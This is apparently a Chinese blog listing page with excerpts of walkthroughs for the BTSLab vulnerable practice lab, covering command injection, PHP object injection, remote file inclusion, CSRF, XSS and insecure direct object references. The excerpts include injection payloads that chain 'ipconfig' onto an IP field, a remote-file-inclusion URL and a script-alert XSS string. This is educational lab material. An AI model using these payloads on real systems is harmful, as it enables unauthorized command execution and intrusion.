练习平台攻略
wkend
菜鸟小白,希望在这里结交朋友,增长知识技能。
展开
-
BTS测试实验室 --- 注入关攻略
0x00 命令注入payload:127.0.0.1 | ipconfig13||ipconfig127.0.0.1&ipconfig127.0.0.1&&ipconfig上面的方式主要是通过管道符让系统执行了命令。‘以下是常用的管道符:0x01 windows系列支持的管道符| 直接执行后面的语句|| 如果前面执行的语句出错,则执行后面的语句,前面的语...原创 2018-10-28 10:05:59 · 1029 阅读 · 0 评论 -
BTS测试实验室 --- 注入关 --- PHP对象注入
0x01 挑战1提到对象注入,首先就要了解对象的序列化与反序列化,所以对象注入漏洞也有人称作反序列化漏洞。有关序列化与反序列的内容,在这里做简单说明。序列化的参数类型表示说明String s:size:valueInteger i:valueBoolean b:valueNull NArray a:size:{key define;value define}Object ...原创 2018-10-28 15:20:24 · 398 阅读 · 0 评论 -
BTS测试实验室--远程文件包含和服务器端注入攻略
远程文件包含构造payload:http://127.0.0.1/btslab/vulnerability/rfi/RFI.php?file=http://192.168.1.129/test2/demo1.php可以看到,远程包含的文件被解析执行了。下面来看看远程文件中的内容是什么?所以说,对于存在远程文件包含漏洞的情况,会造成任意代码被执行的危害。有关这个漏洞更多的实例或讲解,可...原创 2018-10-28 22:34:59 · 552 阅读 · 0 评论 -
BTS测试实验室 --- CSRF
0x00 什么是“CSRF”?以下介绍来自OWASP20130x01 “CSRF”的发现与防止0x02 攻击案例0x03 CSRF 1 — 更改信息以普通用户身份登入(这里我选择tom),进入修改个人信息修改页输入新信息,抓包得到修改页的请求url,注意这里的请求方式是GET接下来构造CSRF攻击,构造攻击页面,接下来已经登录的tom去访问攻击者构造的网站这时候t...原创 2018-11-03 10:58:00 · 1562 阅读 · 0 评论 -
BTS测试实验室 --- 文件包含、SSRF、点击劫持、无限制文件上传
0X00 文件包含1. 什么是“文件包含”?在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。文件包含分为本地文件包含和远程文件包含。2. 本地文件包含利用方式btslab只有本地文件包含,所以这里只演示本地文件包含的利用方式。注意这里的url包含了一个文件news.php我们在本地创建一个新的文件...原创 2018-11-03 16:49:03 · 1878 阅读 · 0 评论 -
BTS测试实验室 --- xss攻略
ox00反射型挑战1payload:<script>alert('xss')</script>挑战2通过尝试发现页面会发生变化,而且参数在url中可见且可控url:http://127.0.0.1/btslab/vulnerability/xss/xss2.php?clr=%23000&Change=%E5%88%87%E6%8D%A2改变参数原创 2018-11-02 21:02:43 · 747 阅读 · 0 评论 -
BTS测试实验室 ---不安全的直接对象引用
0x00 什么是“不安全的直接对象引用”?浏览OWASP对该漏洞的说明下面是2013年OWASP对不安全的直接对象引用的说明:0x01 回到题目查看详细信息首先用普通用户登入,如tom用户查看tom用户的详细信息:注意url中的参数idhttp://127.0.0.1/btslab/myprofile.php?id=4改变该参数值,如http://127.0.0....原创 2018-11-02 21:58:04 · 736 阅读 · 0 评论 -
BTS测试实验室 --- 安全配置错误和丢失的功能级别访问控制
什么是“安全配置错误”漏洞原创 2018-11-02 23:32:05 · 717 阅读 · 0 评论